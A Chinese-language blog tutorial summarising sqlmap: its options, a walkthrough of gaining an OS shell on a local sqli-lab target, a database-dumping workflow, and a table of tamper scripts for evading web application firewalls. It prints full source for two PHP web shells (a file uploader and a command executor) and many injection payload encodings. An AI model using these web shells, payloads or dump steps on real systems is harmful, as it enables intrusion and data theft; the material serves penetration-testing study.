原文作者: Ywc

原文链接: https://yinwc.github.io/2018/07/05/tooluse(sqlmap)/

发表日期: July 5th 2018, 1:20:40 pm

版权声明:

sqlmap使用总结

选项

–version 显示程序的版本号并退出
-h, –help 显示此帮助消息并退出
-v VERBOSE 详细级别：0-6（默认为1）

Target(目标)

以下至少需要设置其中一个选项，设置目标 URL。

-d DIRECT 直接连接到数据库。
-u URL, –url=URL 目标 URL。
-l LIST 从 Burp 或 WebScarab 代理的日志中解析目标。
-r REQUESTFILE 从一个文件中载入 HTTP 请求。
-g GOOGLEDORK 处理 Google dork 的结果作为目标 URL。
-c CONFIGFILE 从 INI 配置文件中加载选项。

Request（请求）

这些选项可以用来指定如何连接到目标URL。

–data=DATA 通过 POST 发送的数据字符串
–cookie=COOKIE HTTP Cookie 头
–cookie-urlencode URL 编码生成的 cookie 注入
–drop-set-cookie 忽略响应的 Set –Cookie 头信息
–user-agent=AGENT 指定 HTTP User –Agent 头
–random-agent 使用随机选定的 HTTP User-Agent 头
–referer=REFERER 指定 HTTP Referer 头
–headers=HEADERS 换行分开，加入其他的 HTTP 头
–auth-type=ATYPE HTTP 身份验证类型（基本，摘要或NTLM）(Basic, Digest or NTLM)
–auth-cred=ACRED HTTP 身份验证凭据（用户名:密码）
–auth-cert=ACERT HTTP 认证证书（key_file，cert_file）
–proxy=PROXY 使用 HTTP 代理连接到目标 URL
–proxy-cred=PCRED HTTP 代理身份验证凭据（用户名：密码）
–ignore-proxy 忽略系统默认的 HTTP 代理
–delay=DELAY 在每个 HTTP 请求之间的延迟时间，单位为秒
–timeout=TIMEOUT 等待连接超时的时间（默认为30 秒）
–retries=RETRIES 连接超时后重新连接的时间（默认3）
–scope=SCOPE 从所提供的代理日志中过滤器目标的正则表达式
–safe-url=SAFURL 在测试过程中经常访问的 url 地址
–safe-freq=SAFREQ 两次访问之间测试请求，给出安全的 URL

Optimization（优化）

这些选项可用于优化 sqlmap.py 的性能。

-o 开启所有优化开关
–predict-output 预测常见的查询输出
–keep-alive 使用持久的 HTTP(S) 连接
–null-connection 从没有实际的 HTTP 响应体中检索页面长度
–threads=THREADS 最大的 HTTP(S) 请求并发量（默认为1）

Injection（注入）

这些选项可以用来指定测试哪些参数，提供自定义的注入 payloads 和可选篡改脚本。

-p TESTPARAMETER 可测试的参数
–dbms=DBMS 强制后端的 DBMS 为此值
–os=OS 强制后端的 DBMS 操作系统为这个值
–prefix=PREFIX 注入 payload 字符串前缀
–suffix=SUFFIX 注入 payload 字符串后缀
–tamper=TAMPER 使用给定的脚本篡改注入数据
–tamper 通过编码绕过 WEB 防火墙（WAF）sqlmap.py 默认用 char()
–tamper 插件所在目录\sqlmap-dev\tamper

Detection（检测）

这些选项可以用来指定在 SQL 盲注时如何解析和比较 HTTP 响应页面的内容

–level=LEVEL 执行测试的等级（1-5，默认为 1）
–risk=RISK 执行测试的风险（0-3，默认为 1）
–string=STRING 查询有效时在页面匹配字符串
–regexp=REGEXP 查询有效时在页面匹配正则表达式
–text-only 仅基于文本内容比较网页

这些选项可用于调整具体的 SQL 注入测试

1
2
3

–technique=TECH SQL 注入技术测试（默认 BEUST）
Techniques（技巧）：
–technique /*测试指定注入类型\使用的技术

不加参数默认测试所有注入技术：

B: 基于布尔的 SQL 盲注
E: 基于显错 sql 注入
U: 基于 UNION 注入
S: 叠层 sql 注入
T: 基于时间盲注

1
2
3

–time-sec=TIMESEC DBMS 响应的延迟时间（默认为 5 秒）
–union-cols=UCOLS 定列范围用于测试 UNION 查询注入
–union-char=UCHAR 用于暴力猜解列数的字符

Fingerprint（指纹）

1	-f, –fingerprint 执行检查广泛的 DBMS 版本指纹

Enumeration（枚举）

这些选项可以用来列举后端数据库管理系统的信息、表中的结构和数据。此外，您还可以运行您自己的 SQL 语句。

-b, –banner 检索数据库管理系统的标识
–current-user 检索数据库管理系统当前用户
–current-db 检索数据库管理系统当前数据库
–is-dba 检测 DBMS 当前用户是否 DBA
–users 枚举数据库管理系统用户
–passwords 枚举数据库管理系统用户密码哈希
–privileges 枚举数据库管理系统用户的权限
–roles 枚举数据库管理系统用户的角色
–dbs 枚举数据库管理系统数据库
–tables 枚举 DBMS 数据库中的表
–columns 枚举 DBMS 数据库表列
–dump 转储数据库管理系统的数据库中的表项
–dump-all 转储所有的 DBMS 数据库表中的条目
–search 搜索列，表和/或数据库名称
-D DB 要进行枚举的数据库名
-T TBL 要进行枚举的数据库表
-C COL 要进行枚举的数据库列
-U USER 用来进行枚举的数据库用户
–exclude-sysdbs 枚举表时排除系统数据库
–start=LIMITSTART 第一个查询输出进入检索
–stop=LIMITSTOP 最后查询的输出进入检索
–first=FIRSTCHAR 第一个查询输出字的字符检索
–last=LASTCHAR 最后查询的输出字字符检索
–sql-query=QUERY 要执行的 SQL 语句
–sql-shell 提示交互式 SQL 的 shell

Brute force(蛮力)

这些选项可以被用来运行蛮力检查。

1 2	–common-tables 检查存在共同表 –common-columns 检查存在共同列

User-defined function injection（用户自定义函数注入）

这些选项可以用来创建用户自定义函数。

User-defined function injection（用户自定义函数注入）：
这些选项可以用来创建用户自定义函数。

1 2	–udf-inject 注入用户自定义函数 –shared-lib=SHLIB 共享库的本地路径

File system access（访问文件系统）

这些选项可以被用来访问后端数据库管理系统的底层文件系统。

File system access（访问文件系统）：
这些选项可以被用来访问后端数据库管理系统的底层文件系统。

1
2
3

–file-read=RFILE 从后端的数据库管理系统文件系统读取文件
–file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件
–file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径

[*]Operating system access（操作系统访问）

这些选项可以用于访问后端数据库管理系统的底层操作系统。

–os-cmd=OSCMD 执行操作系统命令
–os-shell 交互式的操作系统的 shell
–os-pwn 获取一个 OOB shell，meterpreter 或 VNC
–os-smbrelay 一键获取一个 OOB shell，meterpreter 或 VNC
–os-bof 存储过程缓冲区溢出利用
–priv-esc 数据库进程用户权限提升
–msf-path=MSFPATH Metasploit Framework 本地的安装路径
–tmp-path=TMPPATH 远程临时文件目录的绝对路径

`-os-shell`的使用

https://xz.aliyun.com/t/7942

https://blog.csdn.net/qq_61237064/article/details/124154956

使用前提

拥有网站的写入权限

Secure_file_priv参数为空或者为指定路径

满足条件后

1.注入

先对注入点探测

1	sqlmap -u http://127.0.0.1/sqli-lab/less-1/?id=1"

然后执行--os-shell

1	sqlmap -u http://127.0.0.1/sqli-lab/less-1/?id=1" --os-shell

选择php语言

接着这个参数是选择绝对路径

选项一为用这几个路径

选项二为用户自己输入

选项三为用用户的字典

选项四为爆破。

我们满足前提的话，选择2，直接输入自己知道的路径

到这就完成了--os-shell的执行，来看看在sqlmap的执行效果

对于上传的两个文件tmpugvzq.php和tmpbylqf.php我们在数据包中就可以看到，只需要解码就可以得到内容

tmpugvzq.php

0x<?php
if (isset($_REQUEST["upload"])){
	$dir=$_REQUEST["uploadDir"];
	if (phpversion()<'4.1.0')
		{
			$file=$HTTP_POST_FILES["file"]["name"];
			@move_uploaded_file($HTTP_POST_FILES["file"]["tmp_name"],$dir."/".$file) or die();
		}
		else{
			$file=$_FILES["file"]["name"];
			@move_uploaded_file($_FILES["file"]["tmp_name"],$dir."/".$file) or die();
		}
		@chmod($dir."/".$file,0755);
		echo "File uploaded";
	}
	else 
		{
			echo "<form action=".$_SERVER["PHP_SELF"]." method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=C:\\Users\\zhang\\Desktop\\php\\PHPTutorial\\WWW\\sqli-master\\Less-1\\> <input type=submit name=upload value=upload></form>";
		}
?>

根据上面的mysql语句，不难看出这是利用into outfile写入文件

tmpbylqf.php

<?php 
$c=$_REQUEST["cmd"];
@set_time_limit(0);
@ignore_user_abort(1);
@ini_set("max_execution_time",0);
$z=@ini_get("disable_functions");
if(!empty($z))
    {
        $z=preg_replace("/[, ]+/",',',$z);
        $z=explode(',',$z);
        $z=array_map("trim",$z);
    }
else
    {
        $z=array();
    }
    $c=$c." 2>&1\n";
function f($n)
{
    global $z;return is_callable($n)and!in_array($n,$z);
}
if(f("system")){
    ob_start();
    system($c);
    $w=ob_get_clean();
}
elseif(f("proc_open")){
    $y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);
    $w=NULL;
    while(!feof($t[1])){
        $w.=fread($t[1],512);
    }
    @proc_close($y);
}
elseif(f("shell_exec")){
    $w=shell_exec($c);
}
elseif(f("passthru")){
    ob_start();
    passthru($c);
    $w=ob_get_clean();
}
elseif(f("popen")){
    $x=popen($c,r);
    $w=NULL;
    if(is_resource($x)){
        while(!feof($x))
            {
                $w.=fread($x,512);
            }
        }
        @pclose($x);
    }
    elseif(f("exec")){
        $w=array();
        exec($c,$w);
        $w=join(chr(10),$w).chr(10);
    }
    else{
        $w=0;
    }
    echo"<pre>$w</pre>";?>

这是一个用于命令执行的代码，命令执行后会将执行的结果输出。

直接在网站访问这两个shell文件就可以看到了

一个提供了一个上传文件的入口，一个提供了一个以cmd参数的命令执行窗口

成功后会在网站绝对路径下，生成两个文件，一个可以上传，一个可以执行命令。

tmpugvzq.php是可以上传
tmpbylqf.php是可以执行命令

【如果没看到，可以查看wireshark或者先bp抓包数据流并时刻开启监听】

这个时候sqlmap主要做了三件事情：

1
2
3

1、进行目标的一个基础信息的探测。
2、上传shell到目标web网站上。
3、退出时删除shell。

2.Database

数据库支持外连，通过Sqlmap执行--os-shell获取shell。

必要条件：

1
2
3

数据库支持外连

数据库权限为SA权限

Mysql和sqlsever两者的情况不同，详细建议看文章学习

Windows 注册表访问

这些选项可以被用来访问后端数据库管理系统Windows 注册表。

–reg-read 读一个Windows 注册表项值
–reg-add 写一个Windows 注册表项值数据
–reg-del 删除Windows 注册表键值
–reg-key=REGKEY Windows 注册表键
–reg-value=REGVAL Windows 注册表项值
–reg-data=REGDATA Windows 注册表键值数据
–reg-type=REGTYPE Windows 注册表项值类型

General（一般）

这些选项可以用来设置一些一般的工作参数。

-t TRAFFICFILE 记录所有 HTTP 流量到一个文本文件中
-s SESSIONFILE 保存和恢复检索会话文件的所有数据
–flush-session 刷新当前目标的会话文件
–fresh-queries 忽略在会话文件中存储的查询结果
–eta 显示每个输出的预计到达时间
–update 更新 SqlMap
–save file 保存选项到 INI 配置文件
–batch 从不询问用户输入，使用所有默认配置。

Miscellaneous（杂项

–beep 发现 SQL 注入时提醒
–check-payload IDS 对注入 payloads 的检测测试
–cleanup sqlmap.py 具体的 UDF 和表清理 DBMS
–forms 对目标 URL 的解析和测试形式
–gpage=GOOGLEPAGE 从指定的页码使用谷歌 dork 结果
–page-rank Google dork 结果显示网页排名（PR）
–parse-errors 从响应页面解析数据库管理系统的错误消息
–replicate 复制转储的数据到一个 sqlite3 数据库
–tor 使用默认的 Tor（Vidalia/ Privoxy/ Polipo）代理地址
–wizard 给初级用户的简单向导界面

制定测试的种类

1
2
3

–technique=TECH SQL注入技术测试（默认 BEUST）
Techniques（技巧）：
–technique 测试指定注入类型使用的技术

不加参数默认测试所有注入技术:

B: 基于布尔的 SQL 盲注
E: 基于显错 sql 注入
U: 基于 UNION 注入
S: 叠层 sql 注入
T: 基于时间盲注

sqlmap 判断waf

1	sqlmap -u "http://www.test.com/" --identify-waf --batch

一般注入流程

以mysql为例

1.验证注入

1	sqlmap -u “注入点URL”

从中可以发现存在注入的类型，数据库类型和web应用程序PHP和Apache等版本信息。

2.列举数据库名

1 2	sqlmap -u "注入点" --dbs sqlmap -u "注入点" --current-db #列举当前使用的数据库

3.查询某一数据库的所有表名

1	sqlmap -u "注入点" -D 数据库名 --tables

4.列举这一数据库的表的所有列（字段）

1	sqlmap -u "注入点" -D 数据库名 -T 表名 --columns

5.暴字段内容

1	sqlmap -u "注入点" -D 数据库名 -T 表名 -C "要爆的字段名" --dump

爆一个字段的话可能会很慢或者出错，全部暴出最好。

可以在后面加个 –batch 可以不用手动选择yes或no的选项。

sqlmap tamper 的使用

可以进行各种绕过防火墙和waf

1	--tamper xxx.py (.py可以不加)

eg:python sqlmap.py -u “” – tamper base64encode.py
1.普通的tamper搭配方式:

tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,
charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,
nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,
space2randomblank,unionalltounion,unmagicquotes

2.数据库为MSSQL的搭配方式：

tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,
nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,
space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,
unmagicquotes

3.数据库为Mysql的搭配方式:

tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,
greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,
multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,
space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,
versionedkeywords,versionedmorekeywords,xforwardedfor

4.常用脚本用法：

apostrophemask.py UTF-8编码
apostrophenullencode.py unicode编码
appendnullbyte.py 添加%00
base64encode.py base64编码
between.py 以”not between”替换”>“
bluecoat.py 以随机的空白字符替代空格，以”like”替代”=“
chardoubleencode.py 双重url编码
charencode.py url编码
charunicodeencode.py 对未进行url编码的字符进行unicode编码
equaltolike.py 以”like”替代”=“
halfversionedmorekeywords.py在每个关键字前添加条件注释
ifnull2ifisnull.py 以”IF(ISNULL(A), B, A)”替换”IFNULL(A, B)”
modsecurityversioned.py 条件注释
modsecurityzeroversioned.py 条件注释，0000
multiplespaces.py 添加多个空格
nonrecursivereplacement.py 可以绕过对关键字删除的防注入（这个我也不知道怎么说好，看例子。。。）
percentage.py 在每个字符前添加百分号（%）
randomcase.py 随即大小写
randomcomments.py 随机插入区块注释
sp_password.py 语句结尾添加”sp_password”迷惑数据库日志（很。。。）
space2comment.py 以区块注释替换空格
space2dash.py 以单行注释”–”和随机的新行替换空格
space2hash.py 以单行注释”#”和由随机字符组成的新行替换空格
space2morehash.py 没看出来和上面那个有什么区别。。
space2mssqlblank.py 以随机空白字符替换空格
space2mssqlhash.py 以单行注释”#”和新行替换空格
space2mysqlblank.py 以随机空白字符替换空格
space2mysqldash.py 以单行注释和新行替换空格
space2plus.py 以”+”替换空格
space2randomblank.py 随机空白字符替换空格
unionalltounion.py 以”union all”替换”union”
unmagicquotes.py 以”%bf%27”替换单引号，并在结尾添加注释”–”
versionedkeywords.py 对不是函数的关键字条件注释
versionedmorekeywords.py 对关键字条件注释

整理脚本如下：

支持的数据库	编号	脚本名称	作用	实现方式
all	1	apostrophemask.py	用utf8代替引号	(“1 AND ‘1’=’1”) ‘1 AND %EF%BC%871%EF%BC%87=%EF%BC%871’
2	base64encode.py	用base64编码替换	(“1’ AND SLEEP(5)#”) ‘MScgQU5EIFNMRUVQKDUpIw==’
3	multiplespaces.py	围绕SQL关键字添加多个空格	(‘1 UNION SELECT foobar’) ‘1 UNION SELECT foobar’
4	space2plus.py	用+替换空格	(‘SELECT id FROM users’) ‘SELECT+id+FROM+users’
5	nonrecursivereplacement.py	双重查询语句。取代predefined SQL关键字with表示 suitable for替代（例如 .replace（“SELECT”、””)） filters	(‘1 UNION SELECT 2–’) ‘1 UNIOUNIONN SELESELECTCT 2–’
6	space2randomblank.py	代替空格字符（“”）从一个随机的空白字符可选字符的有效集	(‘SELECT id FROM users’) ‘SELECT%0Did%0DFROM%0Ausers’
7	unionalltounion.py	替换UNION ALL SELECT UNION SELECT	(‘-1 UNION ALL SELECT’) ‘-1 UNION SELECT’
8	securesphere.py	追加特制的字符串	(‘1 AND 1=1’) “1 AND 1=1 and ‘0having’=’0having’”
mssql	1	space2hash.py	绕过过滤‘=’ 替换空格字符（”），（’ – ‘）后跟一个破折号注释，一个随机字符串和一个新行（’ n’）	‘1 AND 9227=9227’ ‘1–nVNaVoPYeva%0AAND–ngNvzqu%0A9227=9227’
2	equaltolike.py	like 代替等号	* Input: SELECT * FROM users WHERE id=1 2 * Output: SELECT * FROM users WHERE id LIKE 1
3	space2mssqlblank.py(mssql)	空格替换为其它空符号	Input: SELECT id FROM users Output: SELECT%08id%02FROM%0Fusers
4	space2mssqlhash.py	替换空格	(‘1 AND 9227=9227’) ‘1%23%0AAND%23%0A9227=9227’
5	between.py	用between替换大于号（>）	(‘1 AND A > B–’) ‘1 AND A NOT BETWEEN 0 AND B–’
6	percentage.py	asp允许每个字符前面添加一个%号	* Input: SELECT FIELD FROM TABLE * Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E
7	sp_password.py	追加sp_password’从DBMS日志的自动模糊处理的有效载荷的末尾	(‘1 AND 9227=9227– ‘) ‘1 AND 9227=9227– sp_password’
8	charencode.py	url编码	* Input: SELECT FIELD FROM%20TABLE * Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45
9	randomcase.py	随机大小写	* Input: INSERT * Output: InsERt
10	charunicodeencode.py	字符串 unicode 编码	* Input: SELECT FIELD%20FROM TABLE * Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′
11	space2comment.py	Replaces space character (‘ ‘) with comments ‘/**/’	* Input: SELECT id FROM users * Output: SELECT//id//FROM/**/users
mysql >= 5.1.13	1	equaltolike.py	like 代替等号	* Input: SELECT * FROM users WHERE id=1 2 * Output: SELECT * FROM users WHERE id LIKE 1
2	greatest.py	绕过过滤’>’ ,用GREATEST替换大于号。	(‘1 AND A > B’) ‘1 AND GREATEST(A,B+1)=A’
3	apostrophenullencode.py	绕过过滤双引号，替换字符和双引号。	tamper(“1 AND ‘1’=’1”) ‘1 AND %00%271%00%27=%00%271’
4	ifnull2ifisnull.py	绕过对 IFNULL 过滤。替换类似’IFNULL(A, B)’为’IF(ISNULL(A), B, A)’	(‘IFNULL(1, 2)’) ‘IF(ISNULL(1),2,1)’
5	space2mssqlhash.py	替换空格	(‘1 AND 9227=9227’) ‘1%23%0AAND%23%0A9227=9227’
6	modsecurityversioned.py	过滤空格，包含完整的查询版本注释	(‘1 AND 2>1–’) ‘1 /!30874AND 2>1/–’
7	space2mysqlblank.py	空格替换其它空白符号(mysql)	Input: SELECT id FROM users Output: SELECT%0Bid%0BFROM%A0users
8	between.py	用between替换大于号（>）	(‘1 AND A > B–’) ‘1 AND A NOT BETWEEN 0 AND B–’
9	modsecurityzeroversioned.py	包含了完整的查询与零版本注释	(‘1 AND 2>1–’) ‘1 /!00000AND 2>1/–’
10	space2mysqldash.py	替换空格字符（”）（’ – ‘）后跟一个破折号注释一个新行（’ n’）	(‘1 AND 9227=9227’) ‘1–%0AAND–%0A9227=9227’
11	bluecoat.py	代替空格字符后与一个有效的随机空白字符的SQL语句。然后替换=为like	(‘SELECT id FROM users where id = 1’) ‘SELECT%09id FROM users where id LIKE 1’
12	percentage.py	asp允许每个字符前面添加一个%号	* Input: SELECT FIELD FROM TABLE * Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E
13	charencode.py	url编码	* Input: SELECT FIELD FROM%20TABLE * Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45
14	randomcase.py	随机大小写	* Input: INSERT * Output: InsERt
15	versionedkeywords.py	Encloses each non-function keyword with versioned MySQL comment	* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))# * Output: 1/!UNION!ALL!SELECT!NULL/,/!NULL/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/!AS!CHAR/),CHAR(32)),CHAR(58,100,114,117,58))#
16	space2comment.py	Replaces space character (‘ ‘) with comments ‘/**/’	* Input: SELECT id FROM users * Output: SELECT//id//FROM/**/users
17	charunicodeencode.py	字符串 unicode 编码	* Input: SELECT FIELD%20FROM TABLE * Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′
18	versionedmorekeywords.py	注释绕过	* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))# * Output: 1/!UNION!ALL!SELECT!NULL/,/!NULL/,/!CONCAT/(/!CHAR/(58,122,114,115,58),/!IFNULL/(CAST(/!CURRENT_USER/()/!AS!CHAR/),/!CHAR/(32)),/!CHAR/(58,115,114,121,58))#
MySQL < 5.1	19	halfversionedmorekeywords.py	关键字前加注释	* Input: value’ UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND ‘QDWa’=’QDWa * Output: value’/!0UNION/!0ALL/!0SELECT/!0CONCAT(/!0CHAR(58,107,112,113,58),/!0IFNULL(CAST(/!0CURRENT_USER()/!0AS/!0CHAR),/!0CHAR(32)),/!0CHAR(58,97,110,121,58)), NULL, NULL#/!0AND ‘QDWa’=’QDWa
20	halfversionedmorekeywords.py	当数据库为mysql时绕过防火墙，每个关键字之前添加 mysql版本评论	1.(“value’ UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND ‘QDWa’=’QDWa”) 2.”value’/!0UNION/!0ALL/!0SELECT/!0CONCAT(/!0CHAR(58,107,112,113,58),/!0IFNULL(CAST(/!0CURRENT_USER()/!0AS/!0CHAR),/!0CHAR(32)),/!0CHAR(58,97,110,121,58)),/!0NULL,/!0NULL#/!0AND ‘QDWa’=’QDWa”
MySQL >= 5.1.13	21	space2morehash.py	空格替换为 #号以及更多随机字符串换行符	* Input: 1 AND 9227=9227 * Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
Oracle	1	greatest.py	绕过过滤’>’ ,用GREATEST替换大于号。	(‘1 AND A > B’) ‘1 AND GREATEST(A,B+1)=A’
2	apostrophenullencode.py	绕过过滤双引号，替换字符和双引号。	tamper(“1 AND ‘1’=’1”) ‘1 AND %00%271%00%27=%00%271’
3	between.py	用between替换大于号（>）	(‘1 AND A > B–’) ‘1 AND A NOT BETWEEN 0 AND B–’
4	charencode.py	url编码	* Input: SELECT FIELD FROM%20TABLE * Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45
5	randomcase.py	随机大小写	* Input: INSERT * Output: InsERt
6	charunicodeencode.py	字符串 unicode 编码	* Input: SELECT FIELD%20FROM TABLE * Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′
7	space2comment.py	Replaces space character (‘ ‘) with comments ‘/**/’	* Input: SELECT id FROM users * Output: SELECT//id//FROM/**/users
PostgreSQL	1	greatest.py	绕过过滤’>’ ,用GREATEST替换大于号。	(‘1 AND A > B’) ‘1 AND GREATEST(A,B+1)=A’
2	apostrophenullencode.py	绕过过滤双引号，替换字符和双引号。	tamper(“1 AND ‘1’=’1”) ‘1 AND %00%271%00%27=%00%271’
3	between.py	用between替换大于号（>）	(‘1 AND A > B–’) ‘1 AND A NOT BETWEEN 0 AND B–’
4	percentage.py	asp允许每个字符前面添加一个%号	* Input: SELECT FIELD FROM TABLE * Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E
5	charencode.py	url编码	* Input: SELECT FIELD FROM%20TABLE * Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45
6	randomcase.py	随机大小写	* Input: INSERT * Output: InsERt
7	charunicodeencode.py	字符串 unicode 编码	* Input: SELECT FIELD%20FROM TABLE * Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′
8	space2comment.py	Replaces space character (‘ ‘) with comments ‘/**/’	* Input: SELECT id FROM users * Output: SELECT//id//FROM/**/users
Access	1	appendnullbyte.py	在有效负荷结束位置加载零字节字符编码	(‘1 AND 1=1’) ‘1 AND 1=1%00’
其他		chardoubleencode.py	双url编码(不处理以编码的)	* Input: SELECT FIELD FROM%20TABLE * Output: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545
	unmagicquotes.py	宽字符绕过 GPC addslashes	* Input: 1′ AND 1=1 * Output: 1%bf%27 AND 1=1–%20
	randomcomments.py	用/**/分割sql关键字	‘INSERT’ becomes ‘IN//S//ERT’